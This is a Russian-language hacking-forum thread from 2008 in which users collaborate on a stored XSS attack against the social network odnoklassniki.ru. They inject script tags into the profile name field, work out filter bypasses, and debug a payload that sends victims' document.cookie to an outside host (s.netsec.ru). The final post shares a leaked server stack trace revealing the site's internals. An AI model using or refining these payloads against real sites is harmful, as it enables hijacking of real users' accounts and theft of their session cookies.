Итак наверно всем известно что на одноклассниках есть xss

Discussion in 'Уязвимости' started by andrey_a87, 14 Apr 2008.

  1. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    кеша щас нет в сети
     
  2. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    а про инфрейм это правильная мысль
     
  3. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    а поподробнее можно про инфрейм, как это реализуется?
     
  4. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    ну в общем сделал скрипт поместил его в поле имени,захожу на свой форум пытаюсь написать сообщение и пропало поле ввода...подробнее об xss на odnoklassniki.ru можно прочитать http://video.antichat.ru/file259.html
    скрипт выглядит вот так <script src="www.avlo.freevar.com/1.js"></script>
     
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
    в 1.js напиши:
    alert("XSS");
    и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
    т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал
     
    #25 Scipio, 15 Apr 2008
    Last edited: 15 Apr 2008
  6. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    Сделал как ты сказал,но алерт не вышел, но вот почему не знаю....вот в если в поле имени поставить <script>alert(/test/)</script> то алерт вылетает....мдяяяя дела...
     
  7. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
    не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....
     
  8. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    а протокол не умещается написать)))))
     
  9. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Пишет файл не найден, ты уверен что ты туда его положил?
     
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    хост дерьмовый, у него быввают заскоки.
     
  11. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    я же тебе сказал:
    1. нужно прописывать протокол http://
    2. кавычки как я понимаю там экранируются, не используй их
    3. http://www.avlo.freevar.com/1.js не существует и вобще на этот сайт ругается

    Зарегай страничку на народе как я тебе сказал
     
  12. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    зарегил на народе.... alvo150.narod.ru
    index.html
    ______
    <script src="http://www.alvo150.narod.ru/1.js"></script>



    1.js
    ____
    document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';


    Когда захожу на http://www.alvo150.narod.ru то не перекидывает меня на 1.js...

    Просмотр исходного
    <script src="http://www.alvo150.narod.ru/1.js"></script><!-- ><!-- "><!-- '><!-- --></textarea></form>
    </title></comment></a>
    </div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
    <style>
    #bn {display:block;}
    #bt {display:block;}
    </style>
    <div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
    <script language="JavaScript" src="http://yabs.yandex.ru/show/163"></script>
    <!-- mailto:[email protected] -->
     
  13. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;
     
  14. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru
     
  15. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Да потому что он у тебя кривой

    У тебя там написано:
    Code:
    document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie';
    Убери апостроф после "document.cookie".

    Сделай так:

    Code:
    document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;
    З.Ы.
    Да и вообще, лучше взять в привычку - перед тем как тестировать что либо удалённо, проверить скрипты на локальной тачке.
     
    #35 Qwazar, 15 Apr 2008
    Last edited: 15 Apr 2008
  16. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    выдал такую ошибку :

    Code:
    500 Servlet Exception
    one.ejb.control.client.ControllerFailureException: Can not obtain allowed
    EJB service provider.
    	at one.app.community.dk.model.AWebModel.get(AWebModel.java:536)
    	at one.app.community.dk.model.AWebModel.handleEvent(AWebModel.java:464)
    	at one.app.community.dk.model.AWebModel.performLogin(AWebModel.java:298)
    	at one.app.community.dk.model.AWebModel.performLoginUser(AWebModel.java:286)
    	at one.app.community.dk.servlet.DesktopServlet.handleNotLoginnedException(DesktopServlet.java:264)
    	at one.app.community.dk.servlet.DesktopServlet.doPost(DesktopServlet.java:128)
    	at one.app.community.dk.servlet.DesktopServlet.doGet(DesktopServlet.java:60)
    	at javax.servlet.http.HttpServlet.service(HttpServlet.java:126)
    	at javax.servlet.http.HttpServlet.service(HttpServlet.java:103)
    	at com.caucho.server.http.FilterChainServlet.doFilter(FilterChainServlet.java:96)
    	at one.app.community.filter.BufferingFilter.doFilter(BufferingFilter.java:85)
    	at com.caucho.server.http.FilterChainFilter.doFilter(FilterChainFilter.java:88)
    	at com.caucho.http.filter.GzipFilter.doFilter(GzipFilter.java:128)
    	at com.caucho.server.http.FilterChainFilter.doFilter(FilterChainFilter.java:88)
    	at com.caucho.server.http.Invocation.service(Invocation.java:315)
    	at com.caucho.server.http.HttpRequest.handleRequest(HttpRequest.java:253)
    	at com.caucho.server.http.HttpRequest.handleConnection(HttpRequest.java:170)
    	at com.caucho.server.TcpConnection.run(TcpConnection.java:139)
    	at java.lang.Thread.run(Thread.java:619)
    Resin 2.1.16 (built Tue Feb 15 11:12:27 PST 2005)
    
    без разрывов.
    мб кому-то поможет
     
    #36 Светлый, 22 Apr 2008
    Last edited: 22 Apr 2008